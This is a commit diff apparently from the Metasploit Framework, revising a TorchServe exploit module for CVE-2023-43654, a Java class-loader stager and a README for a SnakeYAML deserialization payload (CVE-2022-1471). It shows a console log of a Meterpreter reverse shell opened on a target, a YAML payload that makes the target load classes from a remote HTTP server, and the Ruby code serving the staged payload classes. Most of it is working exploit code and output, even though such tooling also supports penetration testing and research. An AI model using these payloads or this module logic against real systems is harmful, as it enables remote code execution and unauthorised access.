Address comments from the review
This commit is contained in:
parent
de8e392b7b
commit
86b7ec4518
|
@ -33,20 +33,21 @@ PAYLOAD => java/meterpreter/reverse_tcp
|
|||
msf6 exploit(multi/http/torchserver_cve_2023_43654) > set LHOST 192.168.159.128
|
||||
LHOST => 192.168.159.128
|
||||
msf6 exploit(multi/http/torchserver_cve_2023_43654) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
|
||||
[*] Using URL: http://192.168.159.128:9090/exploit/
|
||||
[*] Using URL: http://192.168.159.128:9090/VLz5xafKtJOjBAv/
|
||||
[*] Registering the model archive...
|
||||
[+] Sending model archive
|
||||
[*] Sending stage (59909 bytes) to 172.17.0.2
|
||||
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 172.17.0.2:39480) at 2023-10-05 16:13:54 -0400
|
||||
[*] Sending stage (57692 bytes) to 172.17.0.2
|
||||
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:49662) at 2023-10-12 09:19:30 -0400
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: model-server
|
||||
meterpreter > sysinfo
|
||||
Computer : 4dbcfe5cc11c
|
||||
Computer : 187de8da4e1b
|
||||
OS : Linux 6.2.15-100.fc36.x86_64 (amd64)
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
|
||||
// javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java
|
||||
import javax.script.ScriptEngine;
|
||||
import javax.script.ScriptEngineFactory;
|
||||
import java.io.IOException;
|
||||
|
|
|
@ -1,17 +1,25 @@
|
|||
# Overview
|
||||
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
|
||||
CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
|
||||
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
|
||||
exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
|
||||
|
||||
See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.
|
||||
|
||||
## Compiling
|
||||
Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
|
||||
It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the
|
||||
[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
|
||||
files.
|
||||
|
||||
Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.
|
||||
|
||||
## Usage
|
||||
Trigger the deserialization using the following YAML:
|
||||
```yaml
|
||||
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
|
||||
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
|
||||
```
|
||||
|
||||
Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
|
||||
contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
|
||||
`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
|
||||
deliver a Metasploit payload.
|
||||
|
||||
[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java
|
||||
|
|
|
@ -63,21 +63,22 @@ module ClassLoader
|
|||
case resource
|
||||
# Stage 1
|
||||
when "#{class_name}.class"
|
||||
vprint_good('Sending constructor class')
|
||||
vprint_good('Sending the constructor class')
|
||||
# This contains the constructor that will call our JavaPayload
|
||||
res = constructor_class
|
||||
# Stage 2
|
||||
when 'metasploit/Payload.class'
|
||||
vprint_good('Sending payload class')
|
||||
vprint_good('Sending the main payload class')
|
||||
# This is our JavaPayload as a compiled class
|
||||
res = MetasploitPayloads.read('java/metasploit/Payload.class')
|
||||
# Stage 3
|
||||
when 'metasploit.dat'
|
||||
vprint_good('Sending payload config')
|
||||
vprint_good('Sending the payload configuration data')
|
||||
# This tells the target how to address the payload; this is the magic!
|
||||
res = payload_instance.stager_config
|
||||
# (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp
|
||||
when /^javapayload\/stage\/(Shell|Stage|StreamForwarder)\.class$/
|
||||
when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/
|
||||
vprint_good("Sending additional payload class: #{resource}")
|
||||
res = MetasploitPayloads.read("java/#{resource}")
|
||||
else
|
||||
vprint_error('Sending 404')
|
||||
|
|
|
@ -70,7 +70,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
version = res.get_json_document.dig('info', 'version')
|
||||
return Exploit::CheckCode::Safe unless version.present?
|
||||
return Exploit::CheckCode::Detected unless version.present?
|
||||
|
||||
unless Rex::Version.new(version) < Rex::Version.new('8.0.2')
|
||||
return Exploit::CheckCode::Safe("Version #{version} is patched.")
|
||||
end
|
||||
|
@ -144,6 +145,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def cleanup
|
||||
super
|
||||
|
||||
return unless @model_name
|
||||
|
||||
# see: https://pytorch.org/serve/management_api.html#unregister-a-model
|
||||
send_request_cgi({
|
||||
'method' => 'DELETE',
|
||||
|
|
Loading…
Reference in New Issue